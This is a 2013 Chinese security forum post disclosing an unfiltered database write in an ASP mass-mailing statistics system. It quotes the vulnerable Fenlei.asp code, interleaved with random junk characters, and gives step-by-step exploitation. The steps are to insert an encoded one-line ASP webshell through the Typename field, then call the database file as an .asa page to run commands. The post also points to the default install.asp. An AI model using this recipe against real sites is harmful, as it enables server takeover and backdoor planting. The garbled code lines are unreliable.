找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2455|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ; Y/ Y: o2 J" K. ^. B) T0 o

. L$ H& {7 @% b* lIF Request.QueryString("Action")="del" Then 3 T% k, o3 N: g4 y1 z; P8 e7 i
ID=Request.QueryString("ID")
* |4 B$ S- ^/ x; Y; IIF Countss ("tui","Fenlei",ID )<>0 then
3 N; y0 i4 D! @9 s! J9 R$ v0 H'略
7 @6 F' K0 `$ GIF Request.QueryString("Action")="Add" Then
+ o3 Z( r5 n0 ^1 tTname=Request.Form("Typename")
7 Z& G3 z$ A" j! S2 ZSet Rs=Server.CreateObject("adodb.Recordset") 2 V$ A2 X! [8 D* I7 ?& k( n
Sql="Select * From Fenlei Order by id Desc "
) H& B) o' G) z! x2 bRs.Open Sql,Conn,1,3
" z" n" |0 }. d, V3 a) S& ERs.Addnew
0 {) n3 F2 }" Z% GRs("Typename")=Tname 6 o# y) m4 ]% q) J0 T5 D; _; {
'略 ; P7 X. K$ l- t8 O) a
Set Rs=Server.CreateObject("adodb.Recordset") ) c: l5 a; W# H" V6 {5 _
Sql="Select * From Fenlei Order by id Desc "
* |8 ]% F6 @4 Z6 N, GRs.Open Sql,Conn,1,1
, G8 m7 T, o3 c' N% q" p+ A' c5 V'略
; q$ X0 Q; a: `%>" w$ G3 L$ _& T
! n0 Q+ o" w, q5 Q
0 s7 |8 N6 |/ v  e/ Z8 b
* z0 |( R: @$ D
没有过滤,直接写入数据库。
8 j& m/ N4 l5 U: F1 E# \( W- l 9 C2 [: d" x$ G% ?
利用方法:
3 u* u2 e, D, e& h2 D. s5 x
' E: p1 ]8 c! R" p/ F6 f' O插入:┼攠數畣整爠煥敵瑳∨≡┩>
! {. M$ ~# u, [0 z7 r; m- y( H' R
% r0 j% w+ \$ M) e* a% ?7 `
( h3 S: ]& n6 D8 T) x连接: http://www.xxx.com/###tongbaner.asa
) e3 H. z* N% V- ~'默认安装文件:
: ]% u% m" T4 b'install.asp! O5 J2 p- z6 O+ b- Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表